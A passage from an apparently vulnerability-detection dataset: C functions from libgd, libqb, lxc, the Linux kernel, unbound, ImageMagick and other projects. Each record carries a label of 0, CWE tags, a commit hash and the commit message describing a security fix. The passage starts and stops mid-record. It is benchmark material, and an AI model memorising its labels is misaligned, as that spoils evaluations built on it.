Cc: Alexander Shishkin <[email protected]>
Cc: Arnaldo Carvalho de Melo <[email protected]>
Cc: Arnaldo Carvalho de Melo <[email protected]>
Cc: Jiri Olsa <[email protected]>
Cc: Kees Cook <[email protected]>
Cc: Linus Torvalds <[email protected]>
Cc: Min Chong <[email protected]>
Cc: Peter Zijlstra <[email protected]>
Cc: Stephane Eranian <[email protected]>
Cc: Thomas Gleixner <[email protected]>
Cc: Vince Weaver <[email protected]>
Fixes: f63a8daa5812 ("perf: Fix event->ctx locking")
Link: http://lkml.kernel.org/r/[email protected]
Signed-off-by: Ingo Molnar <[email protected]>
|
static int appendDynamic(dynamicPtr * dp, const void *src, int size)
{
int bytesNeeded;
char *tmp;
if(!dp->dataGood) {
return FALSE;
}
/* bytesNeeded = dp->logicalSize + size; */
bytesNeeded = dp->pos + size;
if(bytesNeeded > dp->realSize) {
/* 2.0.21 */
if(!dp->freeOK) {
return FALSE;
}
if(overflow2(dp->realSize, 2)) {
return FALSE;
}
if(!gdReallocDynamic(dp, bytesNeeded * 2)) {
dp->dataGood = FALSE;
return FALSE;
}
}
/* if we get here, we can be sure that we have enough bytes
* to copy safely */
/*printf("Mem OK Size: %d, Pos: %d\n", dp->realSize, dp->pos); */
tmp = (char *)dp->data;
memcpy ((void *)(tmp + (dp->pos)), src, size);
dp->pos += size;
if(dp->pos > dp->logicalSize) {
dp->logicalSize = dp->pos;
};
return TRUE;
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
libgd
|
53110871935244816bbb9d131da0bccff734bfe9
| 53,218,732,506,537,070,000,000,000,000,000,000,000 | 43 |
Avoid potentially dangerous signed to unsigned conversion
We make sure to never pass a negative `rlen` as size to memcpy(). See
also <https://bugs.php.net/bug.php?id=73280>.
Patch provided by Emmanuel Law.
|
qb_ipc_us_recv_at_most(struct qb_ipc_one_way *one_way,
void *msg, size_t len, int32_t timeout)
{
int32_t result;
int32_t final_rc = 0;
int32_t to_recv = 0;
char *data = msg;
struct ipc_us_control *ctl = NULL;
int32_t time_waited = 0;
int32_t time_to_wait = timeout;
if (timeout == -1) {
time_to_wait = 1000;
}
qb_sigpipe_ctl(QB_SIGPIPE_IGNORE);
retry_peek:
result = recv(one_way->u.us.sock, data,
sizeof(struct qb_ipc_request_header),
MSG_NOSIGNAL | MSG_PEEK);
if (result == -1) {
if (errno != EAGAIN) {
final_rc = -errno;
if (use_filesystem_sockets()) {
if (errno == ECONNRESET || errno == EPIPE) {
final_rc = -ENOTCONN;
}
}
goto cleanup_sigpipe;
}
/* check to see if we have enough time left to try again */
if (time_waited < timeout || timeout == -1) {
result = qb_ipc_us_ready(one_way, NULL, time_to_wait, POLLIN);
if (qb_ipc_us_sock_error_is_disconnected(result)) {
final_rc = result;
goto cleanup_sigpipe;
}
time_waited += time_to_wait;
goto retry_peek;
} else if (time_waited >= timeout) {
final_rc = -ETIMEDOUT;
goto cleanup_sigpipe;
}
}
if (result >= sizeof(struct qb_ipc_request_header)) {
struct qb_ipc_request_header *hdr = NULL;
hdr = (struct qb_ipc_request_header *)msg;
to_recv = hdr->size;
}
result = recv(one_way->u.us.sock, data, to_recv,
MSG_NOSIGNAL | MSG_WAITALL);
if (result == -1) {
final_rc = -errno;
goto cleanup_sigpipe;
} else if (result == 0) {
qb_util_log(LOG_DEBUG, "recv == 0 -> ENOTCONN");
final_rc = -ENOTCONN;
goto cleanup_sigpipe;
}
final_rc = result;
ctl = (struct ipc_us_control *)one_way->u.us.shared_data;
if (ctl) {
(void)qb_atomic_int_dec_and_test(&ctl->sent);
}
cleanup_sigpipe:
qb_sigpipe_ctl(QB_SIGPIPE_DEFAULT);
return final_rc;
}
| 0 |
[
"CWE-59"
] |
libqb
|
e322e98dc264bc5911d6fe1d371e55ac9f95a71e
| 93,453,098,895,810,540,000,000,000,000,000,000,000 | 77 |
ipc: use O_EXCL on SHM files, and randomize the names
Signed-off-by: Christine Caulfield <[email protected]>
|
static int sig_ignored(struct task_struct *t, int sig, int from_ancestor_ns)
{
/*
* Blocked signals are never ignored, since the
* signal handler may change by the time it is
* unblocked.
*/
if (sigismember(&t->blocked, sig) || sigismember(&t->real_blocked, sig))
return 0;
if (!sig_task_ignored(t, sig, from_ancestor_ns))
return 0;
/*
* Tracers may want to know about even ignored signals.
*/
return !tracehook_consider_ignored_signal(t, sig);
}
| 0 |
[] |
linux-2.6
|
0083fc2c50e6c5127c2802ad323adf8143ab7856
| 56,020,556,380,315,860,000,000,000,000,000,000,000 | 18 |
do_sigaltstack: avoid copying 'stack_t' as a structure to user space
Ulrich Drepper correctly points out that there is generally padding in
the structure on 64-bit hosts, and that copying the structure from
kernel to user space can leak information from the kernel stack in those
padding bytes.
Avoid the whole issue by just copying the three members one by one
instead, which also means that the function also can avoid the need for
a stack frame. This also happens to match how we copy the new structure
from user space, so it all even makes sense.
[ The obvious solution of adding a memset() generates horrid code, gcc
does really stupid things. ]
Reported-by: Ulrich Drepper <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
int in_caplist(int cap, struct lxc_list *caps)
{
struct lxc_list *iterator;
int capid;
lxc_list_for_each(iterator, caps) {
capid = parse_cap(iterator->elem);
if (capid == cap)
return 1;
}
return 0;
}
| 0 |
[
"CWE-59",
"CWE-61"
] |
lxc
|
592fd47a6245508b79fe6ac819fe6d3b2c1289be
| 170,730,645,541,108,340,000,000,000,000,000,000,000 | 13 |
CVE-2015-1335: Protect container mounts against symlinks
When a container starts up, lxc sets up the container's inital fstree
by doing a bunch of mounting, guided by the container configuration
file. The container config is owned by the admin or user on the host,
so we do not try to guard against bad entries. However, since the
mount target is in the container, it's possible that the container admin
could divert the mount with symbolic links. This could bypass proper
container startup (i.e. confinement of a root-owned container by the
restrictive apparmor policy, by diverting the required write to
/proc/self/attr/current), or bypass the (path-based) apparmor policy
by diverting, say, /proc to /mnt in the container.
To prevent this,
1. do not allow mounts to paths containing symbolic links
2. do not allow bind mounts from relative paths containing symbolic
links.
Details:
Define safe_mount which ensures that the container has not inserted any
symbolic links into any mount targets for mounts to be done during
container setup.
The host's mount path may contain symbolic links. As it is under the
control of the administrator, that's ok. So safe_mount begins the check
for symbolic links after the rootfs->mount, by opening that directory.
It opens each directory along the path using openat() relative to the
parent directory using O_NOFOLLOW. When the target is reached, it
mounts onto /proc/self/fd/<targetfd>.
Use safe_mount() in mount_entry(), when mounting container proc,
and when needed. In particular, safe_mount() need not be used in
any case where:
1. the mount is done in the container's namespace
2. the mount is for the container's rootfs
3. the mount is relative to a tmpfs or proc/sysfs which we have
just safe_mount()ed ourselves
Since we were using proc/net as a temporary placeholder for /proc/sys/net
during container startup, and proc/net is a symbolic link, use proc/tty
instead.
Update the lxc.container.conf manpage with details about the new
restrictions.
Finally, add a testcase to test some symbolic link possibilities.
Reported-by: Roman Fiedler
Signed-off-by: Serge Hallyn <[email protected]>
Acked-by: Stéphane Graber <[email protected]>
|
static void sub_remove(struct idr *idp, int shift, int id)
{
struct idr_layer *p = idp->top;
struct idr_layer **pa[MAX_LEVEL];
struct idr_layer ***paa = &pa[0];
struct idr_layer *to_free;
int n;
*paa = NULL;
*++paa = &idp->top;
while ((shift > 0) && p) {
n = (id >> shift) & IDR_MASK;
__clear_bit(n, &p->bitmap);
*++paa = &p->ary[n];
p = p->ary[n];
shift -= IDR_BITS;
}
n = id & IDR_MASK;
if (likely(p != NULL && test_bit(n, &p->bitmap))){
__clear_bit(n, &p->bitmap);
rcu_assign_pointer(p->ary[n], NULL);
to_free = NULL;
while(*paa && ! --((**paa)->count)){
if (to_free)
free_layer(to_free);
to_free = **paa;
**paa-- = NULL;
}
if (!*paa)
idp->layers = 0;
if (to_free)
free_layer(to_free);
} else
idr_remove_warning(id);
}
| 0 |
[] |
linux
|
2dcb22b346be7b7b7e630a8970d69cf3f1111ec1
| 285,481,430,249,634,560,000,000,000,000,000,000,000 | 36 |
idr: fix backtrack logic in idr_remove_all
Currently idr_remove_all will fail with a use after free error if
idr::layers is bigger than 2, which on 32 bit systems corresponds to items
more than 1024. This is due to stepping back too many levels during
backtracking. For simplicity let's assume that IDR_BITS=1 -> we have 2
nodes at each level below the root node and each leaf node stores two IDs.
(In reality for 32 bit systems IDR_BITS=5, with 32 nodes at each sub-root
level and 32 IDs in each leaf node). The sequence of freeing the nodes at
the moment is as follows:
layer
1 -> a(7)
2 -> b(3) c(5)
3 -> d(1) e(2) f(4) g(6)
Until step 4 things go fine, but then node c is freed, whereas node g
should be freed first. Since node c contains the pointer to node g we'll
have a use after free error at step 6.
How many levels we step back after visiting the leaf nodes is currently
determined by the msb of the id we are currently visiting:
Step
1. node d with IDs 0,1 is freed, current ID is advanced to 2.
msb of the current ID bit 1. This means we need to step back
1 level to node b and take the next sibling, node e.
2-3. node e with IDs 2,3 is freed, current ID is 4, msb is bit 2.
This means we need to step back 2 levels to node a, freeing
node b on the way.
4-5. node f with IDs 4,5 is freed, current ID is 6, msb is still
bit 2. This means we again need to step back 2 levels to node
a and free c on the way.
6. We should visit node g, but its pointer is not available as
node c was freed.
The fix changes how we determine the number of levels to step back.
Instead of deducting this merely from the msb of the current ID, we should
really check if advancing the ID causes an overflow to a bit position
corresponding to a given layer. In the above example overflow from bit 0
to bit 1 should mean stepping back 1 level. Overflow from bit 1 to bit 2
should mean stepping back 2 levels and so on.
The fix was tested with IDs up to 1 << 20, which corresponds to 4 layers
on 32 bit systems.
Signed-off-by: Imre Deak <[email protected]>
Reviewed-by: Tejun Heo <[email protected]>
Cc: Eric Paris <[email protected]>
Cc: "Paul E. McKenney" <[email protected]>
Cc: <[email protected]> [2.6.34.1]
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
TEST(Random, FixedSeed) {
// clang-format off
struct ConstantRNG {
typedef uint32_t result_type;
result_type operator()() {
return 4; // chosen by fair dice roll.
// guaranteed to be random.
}
static constexpr result_type min() {
return std::numeric_limits<result_type>::min();
}
static constexpr result_type max() {
return std::numeric_limits<result_type>::max();
}
};
// clang-format on
ConstantRNG gen;
// Pick a constant random number...
auto value = Random::rand32(10, gen);
// Loop to make sure it really is constant.
for (int i = 0; i < 1024; ++i) {
auto result = Random::rand32(10, gen);
EXPECT_EQ(value, result);
}
}
| 0 |
[
"CWE-119",
"CWE-787"
] |
folly
|
8e927ee48b114c8a2f90d0cbd5ac753795a6761f
| 248,597,193,952,926,570,000,000,000,000,000,000,000 | 28 |
Flush secureRandom buffer on fork
Summary: On fork, flush the secureRandom buffer, so that we don't share entropy between the parent and child.
Reviewed By: ricklavoie
Differential Revision: D9196474
fbshipit-source-id: 12ff8488d814466186df61328a5f1d4000beb27f
|
delegpt_set_name(struct delegpt* dp, struct regional* region, uint8_t* name)
{
log_assert(!dp->dp_type_mlc);
dp->namelabs = dname_count_size_labels(name, &dp->namelen);
dp->name = regional_alloc_init(region, name, dp->namelen);
return dp->name != 0;
}
| 0 |
[
"CWE-400"
] |
unbound
|
ba0f382eee814e56900a535778d13206b86b6d49
| 259,026,295,615,259,600,000,000,000,000,000,000,000 | 7 |
- CVE-2020-12662 Unbound can be tricked into amplifying an incoming
query into a large number of queries directed to a target.
- CVE-2020-12663 Malformed answers from upstream name servers can be
used to make Unbound unresponsive.
|
bash_default_completion (text, start, end, qc, compflags)
const char *text;
int start, end, qc, compflags;
{
char **matches, *t;
matches = (char **)NULL;
/* New posix-style command substitution or variable name? */
if (!matches && *text == '$')
{
if (qc != '\'' && text[1] == '(') /* ) */
matches = rl_completion_matches (text, command_subst_completion_function);
else
{
matches = rl_completion_matches (text, variable_completion_function);
/* If a single match, see if it expands to a directory name and append
a slash if it does. This requires us to expand the variable name,
so we don't want to display errors if the variable is unset. This
can happen with dynamic variables whose value has never been
requested. */
if (matches && matches[0] && matches[1] == 0)
{
t = savestring (matches[0]);
bash_filename_stat_hook (&t);
/* doesn't use test_for_directory because that performs tilde
expansion */
if (file_isdir (t))
rl_completion_append_character = '/';
free (t);
}
}
}
/* If the word starts in `~', and there is no slash in the word, then
try completing this word as a username. */
if (matches == 0 && *text == '~' && mbschr (text, '/') == 0)
matches = rl_completion_matches (text, rl_username_completion_function);
/* Another one. Why not? If the word starts in '@', then look through
the world of known hostnames for completion first. */
if (matches == 0 && perform_hostname_completion && *text == '@')
matches = rl_completion_matches (text, hostname_completion_function);
/* And last, (but not least) if this word is in a command position, then
complete over possible command names, including aliases, functions,
and command names. */
if (matches == 0 && (compflags & DEFCOMP_CMDPOS))
{
/* If END == START and text[0] == 0, we are trying to complete an empty
command word. */
if (no_empty_command_completion && end == start && text[0] == '\0')
{
matches = (char **)NULL;
rl_ignore_some_completions_function = bash_ignore_everything;
}
else
{
#define CMD_IS_DIR(x) (absolute_pathname(x) == 0 && absolute_program(x) == 0 && *(x) != '~' && test_for_directory (x))
dot_in_path = 0;
matches = rl_completion_matches (text, command_word_completion_function);
/* If we are attempting command completion and nothing matches, we
do not want readline to perform filename completion for us. We
still want to be able to complete partial pathnames, so set the
completion ignore function to something which will remove
filenames and leave directories in the match list. */
if (matches == (char **)NULL)
rl_ignore_some_completions_function = bash_ignore_filenames;
else if (matches[1] == 0 && CMD_IS_DIR(matches[0]) && dot_in_path == 0)
/* If we found a single match, without looking in the current
directory (because it's not in $PATH), but the found name is
also a command in the current directory, suppress appending any
terminating character, since it's ambiguous. */
{
rl_completion_suppress_append = 1;
rl_filename_completion_desired = 0;
}
else if (matches[0] && matches[1] && STREQ (matches[0], matches[1]) && CMD_IS_DIR (matches[0]))
/* There are multiple instances of the same match (duplicate
completions haven't yet been removed). In this case, all of
the matches will be the same, and the duplicate removal code
will distill them all down to one. We turn on
rl_completion_suppress_append for the same reason as above.
Remember: we only care if there's eventually a single unique
completion. If there are multiple completions this won't
make a difference and the problem won't occur. */
{
rl_completion_suppress_append = 1;
rl_filename_completion_desired = 0;
}
}
}
/* This could be a globbing pattern, so try to expand it using pathname
expansion. */
if (!matches && glob_pattern_p (text))
{
matches = rl_completion_matches (text, glob_complete_word);
/* A glob expression that matches more than one filename is problematic.
If we match more than one filename, punt. */
if (matches && matches[1] && rl_completion_type == TAB)
{
strvec_dispose (matches);
matches = (char **)0;
}
else if (matches && matches[1] && rl_completion_type == '!')
{
rl_completion_suppress_append = 1;
rl_filename_completion_desired = 0;
}
}
return (matches);
}
| 0 |
[
"CWE-20"
] |
bash
|
4f747edc625815f449048579f6e65869914dd715
| 306,731,397,501,749,000,000,000,000,000,000,000,000 | 116 |
Bash-4.4 patch 7
|
static int journal_unmap_buffer(journal_t *journal, struct buffer_head *bh,
int partial_page)
{
transaction_t *transaction;
struct journal_head *jh;
int may_free = 1;
BUFFER_TRACE(bh, "entry");
/*
* It is safe to proceed here without the j_list_lock because the
* buffers cannot be stolen by try_to_free_buffers as long as we are
* holding the page lock. --sct
*/
jh = jbd2_journal_grab_journal_head(bh);
if (!jh)
goto zap_buffer_unlocked;
/* OK, we have data buffer in journaled mode */
write_lock(&journal->j_state_lock);
spin_lock(&jh->b_state_lock);
spin_lock(&journal->j_list_lock);
/*
* We cannot remove the buffer from checkpoint lists until the
* transaction adding inode to orphan list (let's call it T)
* is committed. Otherwise if the transaction changing the
* buffer would be cleaned from the journal before T is
* committed, a crash will cause that the correct contents of
* the buffer will be lost. On the other hand we have to
* clear the buffer dirty bit at latest at the moment when the
* transaction marking the buffer as freed in the filesystem
* structures is committed because from that moment on the
* block can be reallocated and used by a different page.
* Since the block hasn't been freed yet but the inode has
* already been added to orphan list, it is safe for us to add
* the buffer to BJ_Forget list of the newest transaction.
*
* Also we have to clear buffer_mapped flag of a truncated buffer
* because the buffer_head may be attached to the page straddling
* i_size (can happen only when blocksize < pagesize) and thus the
* buffer_head can be reused when the file is extended again. So we end
* up keeping around invalidated buffers attached to transactions'
* BJ_Forget list just to stop checkpointing code from cleaning up
* the transaction this buffer was modified in.
*/
transaction = jh->b_transaction;
if (transaction == NULL) {
/* First case: not on any transaction. If it
* has no checkpoint link, then we can zap it:
* it's a writeback-mode buffer so we don't care
* if it hits disk safely. */
if (!jh->b_cp_transaction) {
JBUFFER_TRACE(jh, "not on any transaction: zap");
goto zap_buffer;
}
if (!buffer_dirty(bh)) {
/* bdflush has written it. We can drop it now */
__jbd2_journal_remove_checkpoint(jh);
goto zap_buffer;
}
/* OK, it must be in the journal but still not
* written fully to disk: it's metadata or
* journaled data... */
if (journal->j_running_transaction) {
/* ... and once the current transaction has
* committed, the buffer won't be needed any
* longer. */
JBUFFER_TRACE(jh, "checkpointed: add to BJ_Forget");
may_free = __dispose_buffer(jh,
journal->j_running_transaction);
goto zap_buffer;
} else {
/* There is no currently-running transaction. So the
* orphan record which we wrote for this file must have
* passed into commit. We must attach this buffer to
* the committing transaction, if it exists. */
if (journal->j_committing_transaction) {
JBUFFER_TRACE(jh, "give to committing trans");
may_free = __dispose_buffer(jh,
journal->j_committing_transaction);
goto zap_buffer;
} else {
/* The orphan record's transaction has
* committed. We can cleanse this buffer */
clear_buffer_jbddirty(bh);
__jbd2_journal_remove_checkpoint(jh);
goto zap_buffer;
}
}
} else if (transaction == journal->j_committing_transaction) {
JBUFFER_TRACE(jh, "on committing transaction");
/*
* The buffer is committing, we simply cannot touch
* it. If the page is straddling i_size we have to wait
* for commit and try again.
*/
if (partial_page) {
spin_unlock(&journal->j_list_lock);
spin_unlock(&jh->b_state_lock);
write_unlock(&journal->j_state_lock);
jbd2_journal_put_journal_head(jh);
return -EBUSY;
}
/*
* OK, buffer won't be reachable after truncate. We just clear
* b_modified to not confuse transaction credit accounting, and
* set j_next_transaction to the running transaction (if there
* is one) and mark buffer as freed so that commit code knows
* it should clear dirty bits when it is done with the buffer.
*/
set_buffer_freed(bh);
if (journal->j_running_transaction && buffer_jbddirty(bh))
jh->b_next_transaction = journal->j_running_transaction;
jh->b_modified = 0;
spin_unlock(&journal->j_list_lock);
spin_unlock(&jh->b_state_lock);
write_unlock(&journal->j_state_lock);
jbd2_journal_put_journal_head(jh);
return 0;
} else {
/* Good, the buffer belongs to the running transaction.
* We are writing our own transaction's data, not any
* previous one's, so it is safe to throw it away
* (remember that we expect the filesystem to have set
* i_size already for this truncate so recovery will not
* expose the disk blocks we are discarding here.) */
J_ASSERT_JH(jh, transaction == journal->j_running_transaction);
JBUFFER_TRACE(jh, "on running transaction");
may_free = __dispose_buffer(jh, transaction);
}
zap_buffer:
/*
* This is tricky. Although the buffer is truncated, it may be reused
* if blocksize < pagesize and it is attached to the page straddling
* EOF. Since the buffer might have been added to BJ_Forget list of the
* running transaction, journal_get_write_access() won't clear
* b_modified and credit accounting gets confused. So clear b_modified
* here.
*/
jh->b_modified = 0;
spin_unlock(&journal->j_list_lock);
spin_unlock(&jh->b_state_lock);
write_unlock(&journal->j_state_lock);
jbd2_journal_put_journal_head(jh);
zap_buffer_unlocked:
clear_buffer_dirty(bh);
J_ASSERT_BH(bh, !buffer_jbddirty(bh));
clear_buffer_mapped(bh);
clear_buffer_req(bh);
clear_buffer_new(bh);
clear_buffer_delay(bh);
clear_buffer_unwritten(bh);
bh->b_bdev = NULL;
return may_free;
}
| 0 |
[
"CWE-416"
] |
linux
|
cc16eecae687912238ee6efbff71ad31e2bc414e
| 191,878,371,301,700,050,000,000,000,000,000,000,000 | 161 |
jbd2: fix use-after-free of transaction_t race
jbd2_journal_wait_updates() is called with j_state_lock held. But if
there is a commit in progress, then this transaction might get committed
and freed via jbd2_journal_commit_transaction() ->
jbd2_journal_free_transaction(), when we release j_state_lock.
So check for journal->j_running_transaction everytime we release and
acquire j_state_lock to avoid use-after-free issue.
Link: https://lore.kernel.org/r/948c2fed518ae739db6a8f7f83f1d58b504f87d0.1644497105.git.ritesh.list@gmail.com
Fixes: 4f98186848707f53 ("jbd2: refactor wait logic for transaction updates into a common function")
Cc: [email protected]
Reported-and-tested-by: [email protected]
Reviewed-by: Jan Kara <[email protected]>
Signed-off-by: Ritesh Harjani <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]>
|
static void add_pixels8_c(uint8_t *av_restrict pixels,
int16_t *block,
int line_size)
{
int i;
for(i=0;i<8;i++) {
pixels[0] += block[0];
pixels[1] += block[1];
pixels[2] += block[2];
pixels[3] += block[3];
pixels[4] += block[4];
pixels[5] += block[5];
pixels[6] += block[6];
pixels[7] += block[7];
pixels += line_size;
block += 8;
}
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
FFmpeg
|
454a11a1c9c686c78aa97954306fb63453299760
| 102,142,874,984,833,940,000,000,000,000,000,000,000 | 19 |
avcodec/dsputil: fix signedness in sizeof() comparissions
Signed-off-by: Michael Niedermayer <[email protected]>
|
MagickExport Image *SampleImage(const Image *image,const size_t columns,
const size_t rows,ExceptionInfo *exception)
{
#define SampleImageTag "Sample/Image"
CacheView
*image_view,
*sample_view;
Image
*sample_image;
MagickBooleanType
status;
MagickOffsetType
progress;
register ssize_t
x1;
ssize_t
*x_offset,
y;
PointInfo
sample_offset;
/*
Initialize sampled image attributes.
*/
assert(image != (const Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
if ((columns == 0) || (rows == 0))
ThrowImageException(ImageError,"NegativeOrZeroImageSize");
if ((columns == image->columns) && (rows == image->rows))
return(CloneImage(image,0,0,MagickTrue,exception));
sample_image=CloneImage(image,columns,rows,MagickTrue,exception);
if (sample_image == (Image *) NULL)
return((Image *) NULL);
/*
Set the sampling offset, default is in the mid-point of sample regions.
*/
sample_offset.x=sample_offset.y=0.5-MagickEpsilon;
{
const char
*value;
value=GetImageArtifact(image,"sample:offset");
if (value != (char *) NULL)
{
GeometryInfo
geometry_info;
MagickStatusType
flags;
(void) ParseGeometry(value,&geometry_info);
flags=ParseGeometry(value,&geometry_info);
sample_offset.x=sample_offset.y=geometry_info.rho/100.0-MagickEpsilon;
if ((flags & SigmaValue) != 0)
sample_offset.y=geometry_info.sigma/100.0-MagickEpsilon;
}
}
/*
Allocate scan line buffer and column offset buffers.
*/
x_offset=(ssize_t *) AcquireQuantumMemory((size_t) sample_image->columns,
sizeof(*x_offset));
if (x_offset == (ssize_t *) NULL)
{
sample_image=DestroyImage(sample_image);
ThrowImageException(ResourceLimitError,"MemoryAllocationFailed");
}
for (x1=0; x1 < (ssize_t) sample_image->columns; x1++)
x_offset[x1]=(ssize_t) ((((double) x1+sample_offset.x)*image->columns)/
sample_image->columns);
/*
Sample each row.
*/
status=MagickTrue;
progress=0;
image_view=AcquireVirtualCacheView(image,exception);
sample_view=AcquireAuthenticCacheView(sample_image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,sample_image,sample_image->rows,1)
#endif
for (y=0; y < (ssize_t) sample_image->rows; y++)
{
register const Quantum
*magick_restrict p;
register Quantum
*magick_restrict q;
register ssize_t
x;
ssize_t
y_offset;
if (status == MagickFalse)
continue;
y_offset=(ssize_t) ((((double) y+sample_offset.y)*image->rows)/
sample_image->rows);
p=GetCacheViewVirtualPixels(image_view,0,y_offset,image->columns,1,
exception);
q=QueueCacheViewAuthenticPixels(sample_view,0,y,sample_image->columns,1,
exception);
if ((p == (const Quantum *) NULL) || (q == (Quantum *) NULL))
{
status=MagickFalse;
continue;
}
/*
Sample each column.
*/
for (x=0; x < (ssize_t) sample_image->columns; x++)
{
register ssize_t
i;
if (GetPixelWriteMask(sample_image,q) <= (QuantumRange/2))
{
q+=GetPixelChannels(sample_image);
continue;
}
for (i=0; i < (ssize_t) GetPixelChannels(sample_image); i++)
{
PixelChannel
channel;
PixelTrait
image_traits,
traits;
channel=GetPixelChannelChannel(sample_image,i);
traits=GetPixelChannelTraits(sample_image,channel);
image_traits=GetPixelChannelTraits(image,channel);
if ((traits == UndefinedPixelTrait) ||
(image_traits == UndefinedPixelTrait))
continue;
SetPixelChannel(sample_image,channel,p[x_offset[x]*GetPixelChannels(
image)+i],q);
}
q+=GetPixelChannels(sample_image);
}
if (SyncCacheViewAuthenticPixels(sample_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,SampleImageTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
sample_view=DestroyCacheView(sample_view);
x_offset=(ssize_t *) RelinquishMagickMemory(x_offset);
sample_image->type=image->type;
if (status == MagickFalse)
sample_image=DestroyImage(sample_image);
return(sample_image);
}
| 0 |
[
"CWE-369"
] |
ImageMagick
|
43539e67a47d2f8de832d33a5b26dc2a7a12294f
| 163,912,684,132,589,960,000,000,000,000,000,000,000 | 172 |
https://github.com/ImageMagick/ImageMagick/issues/1718
|
char *get_interface_name(int index)
{
struct ifreq ifr;
int sk, err;
if (index < 0)
return NULL;
sk = socket(PF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
if (sk < 0) {
perror("Open socket error");
return NULL;
}
memset(&ifr, 0, sizeof(ifr));
ifr.ifr_ifindex = index;
err = ioctl(sk, SIOCGIFNAME, &ifr);
if (err < 0) {
perror("Get interface name error");
close(sk);
return NULL;
}
close(sk);
return g_strdup(ifr.ifr_name);
}
| 0 |
[] |
connman
|
58d397ba74873384aee449690a9070bacd5676fa
| 95,917,689,038,780,250,000,000,000,000,000,000,000 | 28 |
gdhcp: Avoid reading invalid data in dhcp_get_option
|
static int check_revocation(X509_STORE_CTX *ctx)
{
int i = 0, last = 0, ok = 0;
if (!(ctx->param->flags & X509_V_FLAG_CRL_CHECK))
return 1;
if (ctx->param->flags & X509_V_FLAG_CRL_CHECK_ALL)
last = sk_X509_num(ctx->chain) - 1;
else {
/* If checking CRL paths this isn't the EE certificate */
if (ctx->parent)
return 1;
last = 0;
}
for (i = 0; i <= last; i++) {
ctx->error_depth = i;
ok = check_cert(ctx);
if (!ok)
return ok;
}
return 1;
}
| 0 |
[] |
openssl
|
33cc5dde478ba5ad79f8fd4acd8737f0e60e236e
| 95,159,220,083,980,590,000,000,000,000,000,000,000 | 21 |
Compat self-signed trust with reject-only aux data
When auxiliary data contains only reject entries, continue to trust
self-signed objects just as when no auxiliary data is present.
This makes it possible to reject specific uses without changing
what's accepted (and thus overring the underlying EKU).
Added new supported certs and doubled test count from 38 to 76.
Reviewed-by: Dr. Stephen Henson <[email protected]>
|
bool freeze_workqueues_busy(void)
{
bool busy = false;
struct workqueue_struct *wq;
struct pool_workqueue *pwq;
mutex_lock(&wq_pool_mutex);
WARN_ON_ONCE(!workqueue_freezing);
list_for_each_entry(wq, &workqueues, list) {
if (!(wq->flags & WQ_FREEZABLE))
continue;
/*
* nr_active is monotonically decreasing. It's safe
* to peek without lock.
*/
rcu_read_lock_sched();
for_each_pwq(pwq, wq) {
WARN_ON_ONCE(pwq->nr_active < 0);
if (pwq->nr_active) {
busy = true;
rcu_read_unlock_sched();
goto out_unlock;
}
}
rcu_read_unlock_sched();
}
out_unlock:
mutex_unlock(&wq_pool_mutex);
return busy;
}
| 0 |
[
"CWE-200"
] |
tip
|
dfb4357da6ddbdf57d583ba64361c9d792b0e0b1
| 178,242,711,808,574,470,000,000,000,000,000,000,000 | 32 |
time: Remove CONFIG_TIMER_STATS
Currently CONFIG_TIMER_STATS exposes process information across namespaces:
kernel/time/timer_list.c print_timer():
SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
/proc/timer_list:
#11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
Given that the tracer can give the same information, this patch entirely
removes CONFIG_TIMER_STATS.
Suggested-by: Thomas Gleixner <[email protected]>
Signed-off-by: Kees Cook <[email protected]>
Acked-by: John Stultz <[email protected]>
Cc: Nicolas Pitre <[email protected]>
Cc: [email protected]
Cc: Lai Jiangshan <[email protected]>
Cc: Shuah Khan <[email protected]>
Cc: Xing Gao <[email protected]>
Cc: Jonathan Corbet <[email protected]>
Cc: Jessica Frazelle <[email protected]>
Cc: [email protected]
Cc: Nicolas Iooss <[email protected]>
Cc: "Paul E. McKenney" <[email protected]>
Cc: Petr Mladek <[email protected]>
Cc: Richard Cochran <[email protected]>
Cc: Tejun Heo <[email protected]>
Cc: Michal Marek <[email protected]>
Cc: Josh Poimboeuf <[email protected]>
Cc: Dmitry Vyukov <[email protected]>
Cc: Oleg Nesterov <[email protected]>
Cc: "Eric W. Biederman" <[email protected]>
Cc: Olof Johansson <[email protected]>
Cc: Andrew Morton <[email protected]>
Cc: [email protected]
Cc: Arjan van de Ven <[email protected]>
Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast
Signed-off-by: Thomas Gleixner <[email protected]>
|
xfs_attr_set(
struct xfs_inode *dp,
const unsigned char *name,
unsigned char *value,
int valuelen,
int flags)
{
struct xfs_mount *mp = dp->i_mount;
struct xfs_buf *leaf_bp = NULL;
struct xfs_da_args args;
struct xfs_defer_ops dfops;
struct xfs_trans_res tres;
xfs_fsblock_t firstblock;
int rsvd = (flags & ATTR_ROOT) != 0;
int error, err2, local;
XFS_STATS_INC(mp, xs_attr_set);
if (XFS_FORCED_SHUTDOWN(dp->i_mount))
return -EIO;
error = xfs_attr_args_init(&args, dp, name, flags);
if (error)
return error;
args.value = value;
args.valuelen = valuelen;
args.firstblock = &firstblock;
args.dfops = &dfops;
args.op_flags = XFS_DA_OP_ADDNAME | XFS_DA_OP_OKNOENT;
args.total = xfs_attr_calc_size(&args, &local);
error = xfs_qm_dqattach(dp, 0);
if (error)
return error;
/*
* If the inode doesn't have an attribute fork, add one.
* (inode must not be locked when we call this routine)
*/
if (XFS_IFORK_Q(dp) == 0) {
